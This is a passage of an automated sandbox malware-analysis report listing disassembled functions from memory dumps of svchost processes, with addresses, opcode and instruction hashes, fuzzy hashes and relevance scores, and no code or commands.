                                                  • Opcode ID: 2a36091bba8e423a9381086a3a466a6ba656a9a8b227c3da6eeb988af5e103cb
                                                  • Instruction ID: 037baccb8846aa88e3df8518535986e951c9a00b76841c40436778ff40fa903e
                                                  • Opcode Fuzzy Hash: 2a36091bba8e423a9381086a3a466a6ba656a9a8b227c3da6eeb988af5e103cb
                                                  • Instruction Fuzzy Hash: 3D52A461B29E494FE7A8FB6894756BDB6D2EF9C300F4405BDE05EC32D6DE38A8418341
                                                  Function 00007FFD9B882259 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1229d5eccd5523dac140433f60635ebdb656a4c8426fb926b8eaa2a2063e6126
                                                  • Instruction ID: 152b0a11e882f34c17a05b3ee4f47cc5bf9f7b3c4c1ee218c9e604ba79fb58bc
                                                  • Opcode Fuzzy Hash: 1229d5eccd5523dac140433f60635ebdb656a4c8426fb926b8eaa2a2063e6126
                                                  • Instruction Fuzzy Hash: 84510110B0E6C90FD796ABB85875665AFE0DF9B219B1800FBE099C71E7DE181806C342
                                                  Function 00007FFD9B8809FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :O_^$k:O
                                                  • API String ID: 0-93555433
                                                  • Opcode ID: 6c5949a974c5d17983982be7fb11d557d051df61207f1cd2245fcd401fad0af5
                                                  • Instruction ID: 18129d0c83e3be99295b59dbbe307361360f99e2f0677788bd429425cb146695
                                                  • Opcode Fuzzy Hash: 6c5949a974c5d17983982be7fb11d557d051df61207f1cd2245fcd401fad0af5
                                                  • Instruction Fuzzy Hash: F201A25FB085A28AD307776EB4A55ECAB90DEC533AB0845B3C3C98E483951458CB93D5
                                                  Function 00007FFD9B88130D Relevance: .5, Instructions: 512COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6ed1db165e75fe906c21625dc5a26a74f40e278205ecff05cbd481503f718233
                                                  • Instruction ID: d661939337e2346c095f96c33d55e1a0eab9925a2ca67bc6743fb1085bf7a176
                                                  • Opcode Fuzzy Hash: 6ed1db165e75fe906c21625dc5a26a74f40e278205ecff05cbd481503f718233
                                                  • Instruction Fuzzy Hash: 9F410632F09A4A4FD755FBACE8750EC7BB1EF89210B4801B7D099DB1E2ED2828468340
                                                  Function 00007FFD9B880A68 Relevance: .3, Instructions: 277COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97e410ba3f1fd826e56c79ea3cb4eb71a50b56ae45b8dac00fffa51551007f35
                                                  • Instruction ID: 64f3b766840cea5c46964bc073b543c6e1f1ac793b93dd037511d4444d7b1330
                                                  • Opcode Fuzzy Hash: 97e410ba3f1fd826e56c79ea3cb4eb71a50b56ae45b8dac00fffa51551007f35
                                                  • Instruction Fuzzy Hash: B7716E27B1896A8BD705BB7CB861AED7BA1EFC5324B4805B7D119CB1C3CD24748683D0
                                                  Function 00007FFD9B880EEE Relevance: .2, Instructions: 202COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8d77542eddcceff55b4ac1835a6b9e224939d055a1f97a8582fe3b79577bbbc
                                                  • Instruction ID: d564f71021e9b69c8383249e9712d9bf756b57501a0edf6486d8af198eebd0b4
                                                  • Opcode Fuzzy Hash: c8d77542eddcceff55b4ac1835a6b9e224939d055a1f97a8582fe3b79577bbbc
                                                  • Instruction Fuzzy Hash: 50513621B0EA8A0FE35AA77C58669B53BD1DF86224B0940FBD49DC71EBDC1C68478352
                                                  Function 00007FFD9B880790 Relevance: .2, Instructions: 197COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 512675c7942d2aeb3e7d9f146f9d7720895f42bb3efa4dc17e9564b1dcf51db2
                                                  • Instruction ID: 5aa256c163a97d1b78b00db14dd6e8faea33b52749c0bd93dd08765d938cf0f5
                                                  • Opcode Fuzzy Hash: 512675c7942d2aeb3e7d9f146f9d7720895f42bb3efa4dc17e9564b1dcf51db2
                                                  • Instruction Fuzzy Hash: A4612726B09A594FD309EB6CA8B14E8BF60EFC431479840FBD099CB2DBDD3478468781
                                                  Function 00007FFD9B880BF3 Relevance: .2, Instructions: 158COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a7ca41696095a43e140eac343e95f5e7a7c9dc285e696347d851b1a379e1987b
                                                  • Instruction ID: f9a1429bd600456944c7c96bf083dcdcd5f746988172fde12893dd5fbbf2415c
                                                  • Opcode Fuzzy Hash: a7ca41696095a43e140eac343e95f5e7a7c9dc285e696347d851b1a379e1987b
                                                  • Instruction Fuzzy Hash: 3641F625B19A5A8FEB49EB6C9861AED7BB1FFC8310F44047AD018C72C7CD38B8468751
                                                  Function 00007FFD9B880650 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c51c43c4c03ddaaca01fb57fc5851570e7597c9734ef31d5a02180be34789688
                                                  • Instruction ID: b526c0dc9c358cf1d78154c9a65c5d007343430271f9e5ff467339af15bc6f9c
                                                  • Opcode Fuzzy Hash: c51c43c4c03ddaaca01fb57fc5851570e7597c9734ef31d5a02180be34789688
                                                  • Instruction Fuzzy Hash: E131A721B189490FE798EB6C587A679A7C1EF98315F1405BAE41EC32EBDD286C418341
                                                  Function 00007FFD9B880D81 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: add2f27d47c5fc0895ba1a77028ff9c34ed8d21ccf5864f307dd93ac43d20c93
                                                  • Instruction ID: 96cbdb4567f653cf8ac87dbf01166e20000820b8cd7e220c6a5ee4567813021f
                                                  • Opcode Fuzzy Hash: add2f27d47c5fc0895ba1a77028ff9c34ed8d21ccf5864f307dd93ac43d20c93
                                                  • Instruction Fuzzy Hash: 5D21E552B1DA494FE759A7BC5C3A7B977D2EF98700F0442BAE01CC31D6EE2868428342
                                                  Function 00007FFD9B880870 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: dd92b70da785d3af47ceadcbc2ab16bbed9d5d4d5c3d006c6cbddd78ec7690b5
                                                  • Instruction ID: 67278ef6bdb55d8b5d08d9627b5d12471ef1d2eb01546e58ded34071c9ce9728
                                                  • Opcode Fuzzy Hash: dd92b70da785d3af47ceadcbc2ab16bbed9d5d4d5c3d006c6cbddd78ec7690b5
                                                  • Instruction Fuzzy Hash: C8318520758A494FD348EB28A4B19ADBF71EFC82007D844EAD41AC73DEDD3479518782
                                                  Function 00007FFD9B882421 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ec82c7d7a51454a69ef6e27ac0011d29019d91a8c504851fe290a0e1b36f3f96
                                                  • Instruction ID: 30b543bd01d3b0f2be0cf22afa66b5b4a06c04755ba24ebff8303169a33a32b8
                                                  • Opcode Fuzzy Hash: ec82c7d7a51454a69ef6e27ac0011d29019d91a8c504851fe290a0e1b36f3f96
                                                  • Instruction Fuzzy Hash: 46017B04A0EB890FE355AB7C5C71835BFE0DF99250B0905ABE89CC70E7D8186A418392
                                                  Function 00007FFD9B880E67 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ac68bdb97575d704fc9688266c0c1cc0252eb35507c35919aa3c0af70b376915
                                                  • Instruction ID: f82a16eb2f99a1c5831337e95d8f62e2ad94ca70e08f207f86c16f789bd32387
                                                  • Opcode Fuzzy Hash: ac68bdb97575d704fc9688266c0c1cc0252eb35507c35919aa3c0af70b376915
                                                  • Instruction Fuzzy Hash: 4DE06D25B14D0D4FEF44BBACA8557FCA2D2EB8C616F100177D61DC329ADE2858428391

                                                  Executed Functions

                                                  Function 00007FFD9B8A1779 Relevance: .9, Instructions: 907COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c798eb7144a8587f3362c74fc974c17afa62fb949680e80b434013481066f20c
                                                  • Instruction ID: b01814ec980a53669deea22e94b74ed806751a4d759c1d4c93bcadc6f0d7cc9f
                                                  • Opcode Fuzzy Hash: c798eb7144a8587f3362c74fc974c17afa62fb949680e80b434013481066f20c
                                                  • Instruction Fuzzy Hash: A752A861F29E494FE7A8FB789879679B7D2FF98700F4405B9E04DC32D6DE28A8418341
                                                  Function 00007FFD9B8A2259 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c9974e1d19cae61b45deaba34dfc01cb92e91987f0e5954ad6197e494ba9d874
                                                  • Instruction ID: 1c4ef1dfa28bbc09d3472459a3184709be4ab82089cef44fa09d9db3789365f4
                                                  • Opcode Fuzzy Hash: c9974e1d19cae61b45deaba34dfc01cb92e91987f0e5954ad6197e494ba9d874
                                                  • Instruction Fuzzy Hash: 0E51FF10B0E6C90FD7A6ABB85835675BFE0DF9B219B0801FBE089C71E7DD081806C352
                                                  Function 00007FFD9B8A09FA Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :M_^$k:M
                                                  • API String ID: 0-4016585720
                                                  • Opcode ID: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction ID: 002624ae95b24f00070e4224984cc128ce93d50c3f3842865c8409bf0b040c84
                                                  • Opcode Fuzzy Hash: 7f384c46407f87ab70c4cb98aa26fca2e5f1f7c0fdb9c37e58a745140368e15d
                                                  • Instruction Fuzzy Hash: 1801A75B7095A989D3077BADB8554ECBB90DE86339B0843F3D2C98D0839914508797C5
                                                  Function 00007FFD9B8A130D Relevance: .5, Instructions: 512COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 34f601ce3bacbfd2ff7c70601974dd75b06f664dbbd57e56040f4de0a02756d2
                                                  • Instruction ID: 4e5ef72f7d2bf7568e1f079d645afcc1c442e4c67600379e2ae87e0ebfc7ad83
                                                  • Opcode Fuzzy Hash: 34f601ce3bacbfd2ff7c70601974dd75b06f664dbbd57e56040f4de0a02756d2
                                                  • Instruction Fuzzy Hash: B041D462B0A64E4FDB55FBACE8754EC7BB1EF4A210B4502B7D059D71A3ED282502C750
                                                  Function 00007FFD9B8A0A68 Relevance: .3, Instructions: 279COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 397d6d665f4120290a921e00cf75a078d57ea24428a28ff646b22a36b56d0d48
                                                  • Instruction ID: d370e310d1c0bfc98aa50cb405f1a2a24b9d461fde218d839f1ee59315fa9182
                                                  • Opcode Fuzzy Hash: 397d6d665f4120290a921e00cf75a078d57ea24428a28ff646b22a36b56d0d48
                                                  • Instruction Fuzzy Hash: 45715726B1996E8AD709BB7CBC25AED7BA1EF85324F4846B7D04CCB1C3DD24644683D0
                                                  Function 00007FFD9B8A0705 Relevance: .3, Instructions: 262COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8ba3bf44c9d020c59c877d1b5666312a856118bc65af8efafbdda55c6af36def
                                                  • Instruction ID: 9f738b35232973c8f42ff10286886eb57ae6932491999f0f815350d1462fc0d5
                                                  • Opcode Fuzzy Hash: 8ba3bf44c9d020c59c877d1b5666312a856118bc65af8efafbdda55c6af36def
                                                  • Instruction Fuzzy Hash: 0A81596AB2E9894FD349EB6C68764E47BA0EF45304B8480BBD09CC72DBDD347942C752
                                                  Function 00007FFD9B8A0EEE Relevance: .2, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e276ca24244e9d08efe39fa7676ae0d9f79dcaba66a15ce695313246ce2f3154
                                                  • Instruction ID: bbb3c58afee7aa7e94ea1bd0a4d3ee08a32dcb877dda67bfb26d4891dad788d7
                                                  • Opcode Fuzzy Hash: e276ca24244e9d08efe39fa7676ae0d9f79dcaba66a15ce695313246ce2f3154
                                                  • Instruction Fuzzy Hash: F2512621B1E6CA0FE35AA77C58669B57BD1DF86224B0940FBD49DC71EBDC0C68438352
                                                  Function 00007FFD9B8A0BF2 Relevance: .2, Instructions: 157COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7ad0f4bfeb988f5dae9f405ec1a91c94e6dd4b16e8aa4cccd759f701dfd30e62
                                                  • Instruction ID: 4fe59562f131777d7a6014050149d586c5139550deb325cf35e053a009d391da
                                                  • Opcode Fuzzy Hash: 7ad0f4bfeb988f5dae9f405ec1a91c94e6dd4b16e8aa4cccd759f701dfd30e62
                                                  • Instruction Fuzzy Hash: 00412625B29A5D8FEB49FBAC98656ED7BE1EF88300F4445B6D008C32C7DD24A446C751
                                                  Function 00007FFD9B8A0650 Relevance: .1, Instructions: 138COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 46930983fe2245ace2c2a8b1be118430fbf1ab5e8ae8585ca3ad6a5b6796ba39
                                                  • Instruction ID: fb2b2d53cb1e14d07b8c038cfa5ef92dce774a92a3788216922129215ffeab6d
                                                  • Opcode Fuzzy Hash: 46930983fe2245ace2c2a8b1be118430fbf1ab5e8ae8585ca3ad6a5b6796ba39
                                                  • Instruction Fuzzy Hash: C131D621B1C9480FE798EB6C587A679A7C2EF9D315F0405BAE00EC32EBDD58AC418341
                                                  Function 00007FFD9B8A0D81 Relevance: .1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction ID: 73f409b1edb0e2a466ea2b8c30110559b8874984d12259c42338263cf9d35d62
                                                  • Opcode Fuzzy Hash: 39d8834b6f45c188957eaf5e477921206e2725c3f7f5111ae5d71cd66e37c10a
                                                  • Instruction Fuzzy Hash: 4B21E152B19A494FE759A7B85C2A6B877D2EF98740F0403BAE00CC31D6EE1868428352
                                                  Function 00007FFD9B8A0870 Relevance: .1, Instructions: 96COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f1fa4d4c47bf450bbbeab2f5b14d5fff6d44aefb5877e9f169fbccb713421d8
                                                  • Instruction ID: 9b96d271e26307a24f838cd6b9bf3e4c7875141c9960de30915c919cc1ac844f
                                                  • Opcode Fuzzy Hash: 1f1fa4d4c47bf450bbbeab2f5b14d5fff6d44aefb5877e9f169fbccb713421d8
                                                  • Instruction Fuzzy Hash: C9317529B74D494FD38DF72894B99A9BFB1EF88200FC085A9D419C33CADD746941C752
                                                  Function 00007FFD9B8A2421 Relevance: .0, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bc8e523b84578044c41ccb110cf6bd5bc1335adf53941275ad8dc180c935fe17
                                                  • Instruction ID: c649c69dc12f7e71d0f89d8df3f0d951f34cc5d668a815bf8e35a8ff05fad199
                                                  • Opcode Fuzzy Hash: bc8e523b84578044c41ccb110cf6bd5bc1335adf53941275ad8dc180c935fe17
                                                  • Instruction Fuzzy Hash: BD017B14A0FB994FE365AB7858718757FE0DF99210B0905BBE8C8C71E7E808AA418392
                                                  Function 00007FFD9B8A0E67 Relevance: .0, Instructions: 33COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1907418190.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_7ffd9b8a0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction ID: d4a1be4dbb91d95f671ba3bb4479e002fd0361fa0f5342f78bc72855bd9b8427
                                                  • Opcode Fuzzy Hash: 6612891d5c1cb9611464f8079bb196cede8a8c0772d68f84c113412ab0e064bd
                                                  • Instruction Fuzzy Hash: B7E06D21B1490D4FEF44BBACA8557FCB2D2EB8C616F1002B7D51DC329ADE2858028391

                                                  Executed Functions

                                                  Function 00007FFD9B8B1779 Relevance: .9, Instructions: 907COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 79c84c40eea7a200575d4eefdd4a3632c1203e1db3e5daa27c195ca40b453417
                                                  • Instruction ID: cff04a761f131f5ccb2e5bcf8334d0f802ddf44f9b465d8de481ec1a8b78e53e
                                                  • Opcode Fuzzy Hash: 79c84c40eea7a200575d4eefdd4a3632c1203e1db3e5daa27c195ca40b453417
                                                  • Instruction Fuzzy Hash: 7A52FA61F29A594FE758FB789479A7977D2FF9C300F4405B9E00EC32D6DE28A8418781
                                                  Function 00007FFD9B8B2259 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: bae09693b85d71d14ca973f35f3ce9322668b19714d44180425eb505acd5793d
                                                  • Instruction ID: cee3a763324eb68ed1fa69a82ab8c84c7089ad92782ebca3377aeb70d6d04866
                                                  • Opcode Fuzzy Hash: bae09693b85d71d14ca973f35f3ce9322668b19714d44180425eb505acd5793d
                                                  • Instruction Fuzzy Hash: 2B51EF11B0E6C90FD796ABB85875675BFE0DF9B219B1800FBE099C71E7DD085806C782
                                                  Function 00007FFD9B8B09FA Relevance: 2.6, Strings: 2, Instructions: 50COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: :L_^$k:L
                                                  • API String ID: 0-2007851088
                                                  • Opcode ID: 3ae2815b22d4748dcda899e01171a4bf352aebcfef83c12133de718c7890032d
                                                  • Instruction ID: 1e5f636febffa4ba0124d884811f75e14e4fccf51974d01fc275853f6f548afa
                                                  • Opcode Fuzzy Hash: 3ae2815b22d4748dcda899e01171a4bf352aebcfef83c12133de718c7890032d
                                                  • Instruction Fuzzy Hash: 3B012B177085A289D3077BBDB8554FCBB90DE86379B4801F3C2C98E0A7D51450CB83C6
                                                  Function 00007FFD9B8B130D Relevance: .5, Instructions: 512COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5afe5c18f6d1bf7adae3c4ccec8fa5721e3e7e78de5068d26ab6c35fb317df77
                                                  • Instruction ID: 97758e46460f5d5093efa02c13d9263802171f163d80d8c48c425aa732c177c4
                                                  • Opcode Fuzzy Hash: 5afe5c18f6d1bf7adae3c4ccec8fa5721e3e7e78de5068d26ab6c35fb317df77
                                                  • Instruction Fuzzy Hash: 25410433F19A5A4FDB55E7BCE8760ED7BB1EF4A250B4401B7C049DB1E2ED2828028780
                                                  Function 00007FFD9B8B05FA Relevance: .4, Instructions: 406COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.1988697921.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_7ffd9b8b0000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 738ece53ecd11d3be890b85c9ffe3ff3c486b1f3d6cc54d9bee206e4570eed09
                                                  • Instruction ID: 39ed9b80e487b8b0f088fba58977cca75d05eb6ec536c0a38483f6595c6de554
                                                  • Opcode Fuzzy Hash: 738ece53ecd11d3be890b85c9ffe3ff3c486b1f3d6cc54d9bee206e4570eed09
                                                  • Instruction Fuzzy Hash: 74C16A53B0E6AA4FD319EBACAC794E97F50EF8136474840BBC0888B1E7DD246506C7D2
                                                  Function 00007FFD9B8B0A68 Relevance: .3, Instructions: 272COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
